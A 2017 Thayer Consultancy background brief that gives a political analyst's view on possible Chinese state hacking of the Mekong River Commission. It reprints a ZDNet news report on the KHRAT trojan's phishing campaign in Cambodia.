Thayer Consultancy Background Briefing:

ABN # 65 648 097 123

Chinese Hackers Target Mekong
River Commission
Carlyle A. Thayer
September 4, 2017

Recently there was a spearphishing/trojan attack in Cambodia that seemed to target

individuals working on a World Bank project related to the Mekong River Commission
(MRC).
http://www.zdnet.com/article/khrat-trojan-sweeps-across-cambodia/ [See below for
full report]
A cyber security expert said the hallmarks of this attack appear to link it to the
DragonOK campaign, which is funded by China.
Given that China is not all too fond of the MRC, is it reasonable to speculate that this
may have been an attack targeted at the MRC for geopolitical reasons related to
management of the river system? The scientific data collected by the MRC is highly
political, for many concerned parties it is evidence of the destructive nature of
hydropower development...
ANSWER: At the start of this year Chinese directed phishing attacks against Cambodian
citizens was reported. In mid-year these attacks were directed at opposition political
parties.
Chinese hackers associated with DragonOK have been reported targeting high-end
technology companies in Asia such in Japan and Taiwan.
Chinese hackers are either state supported or operate on behalf of Chinese
commercial interests.
The targeting of the Mekong River Commission suggests the following. China,
generally, prefers to purloin information rather than gather it directly if this method
is cheaper. Chinese hackers also are both discriminate and indiscriminate in their
targets. China gathers commercially useful information as a matter of course not least
of which is to give Chinese companies an edge in bidding or in negotiations with
foreign partners.
China set up the AIIB (Asia Infrastructure Investment Bank) after the U.S. reneged on
promises to change the voting weight in the World Bank in favour of the BRICS.
Chinese hackers would have multiple objectives: (1) identify weaknesses in software
and cyber security, (2) acquire information that would be more costly by legitimate
 2

means, and (3) have the capability to mount a disabling cyberattack when the moment
suited.
The bottom line is that China sanctions and engages in hacking as a matter of course.
While some hacking is specific, other hacking efforts are designed just to gather
information to expand files and data bases.

KHRAT Trojan sweeps across Cambodia

The RAT has ramped up its technology and techniques to compromise victim PCs, but
campaigns appear to have a political purpose.
James Martin | CNET
The KHRAT Trojan has been spotted targeting citizens of Cambodia with new
capabilities and weaponry.
The Remote Access Trojan (RAT) has been in the wild for some time, but this year,
more modern variants have emerged.
According to Palo Alto Networks' Unit 42 security team, KHRAT is currently being used
by threat actors to target Cambodian citizens, with the overall aim of enslaving PCs,
stealing information including system language and IP address, and spying through the
use of keylogging, screenshots, and remote shell access.
In a blog post, the group said there has been an uptick in activity in recent months,
while the first surge against Cambodian victims was discovered back in June.
KHRAT is now being deployed through fresh spam and phishing campaigns, with
fraudulent emails containing weaponized attachments relating to the Mekong
Integrated Water Resources Management Project (MIWRMP), a million-dollar scheme
funded by the World Bank which is currently being deployed to improve water and
fisheries management in North Eastern Cambodia.
ADVERTISING
One malicious document used to spread the RAT is called "Mission Announcement
Letter for MIWRMP phase three implementation support mission, June 26-30,
2017(update).doc," which relates to the project in its current design stage.
The attachment, however, contacts a Russian IP address and uses the domain
update.upload-dropbox[.]com in order to dupe victims into believing they are
connecting to the legitimate Dropbox cloud storage service.
In addition, the malware was also hosted on the Cambodian Government's website at
a time the domain was compromised.
Once downloaded and opened, the crafted Word document then claims the user's
Office version isn't compatible, so they must click a link and permit macro content
which executes the Trojan.
KHRAT then deploys additional malicious code payloads, modifies the Windows
registry, and creates persistence by forcing Microsoft Word to re-execute the Trojan
should a document be reloaded from the most recently used document list.
 3

The Trojan also masks its activities using the legitimate regsvr32.exe program,
schedules a range of innocent-looking tasks, and creates calling functions to run
JavaScript code.
An interesting aspect of the Trojan found within the dropper code is a link to a blog
hosted on the Chinese Software Developer Network (CSDN) website which contains
an "almost identical" code sample of a click-tracking system in the malware.
"The JavaScript code in probe_sl.js uses a click-tracking technique, presumably so the
actors can monitor who is visiting their site," the researchers note. "It may also be an
attempt to control the distribution of later stage malware and tools, by only sending
it in response to requests from desired victims or vulnerable systems, and dropping
requests from others such as researchers."
Palo Alto Networks believes that the threat actors behind KHRAT have evolved the
Trojan to include targeted spear phishing and click-tracking in order to more
successfully target victims of interest in Cambodia.
Considering the political nature of the spear phishing emails, the campaigns may have
the purpose of spying on political rivals or disrupting political activity.
"This most recent campaign highlights social engineering techniques being used with
reference and great detail given to nationwide activities, likely to be forefront of
peoples' minds," the researchers say. "We believe this malware, the infrastructure
being used, and the TTPs (tactics, techniques, and procedures) highlight a more
sophisticated threat actor group, which we will continue to monitor closely."

Suggested citation: Carlyle A. Thayer, Chinese Hackers Target Mekong River

Commission, Thayer Consultancy Background Brief, September 4, 2017. All
background briefs are posted on Scribd.com (search for Thayer). To remove yourself
from the mailing list type, UNSUBSCRIBE in the Subject heading and hit the Reply key.

Thayer Consultancy provides political analysis of current regional security issues and
other research support to selected clients. Thayer Consultancy was officially
registered as a small business in Australia in 2002.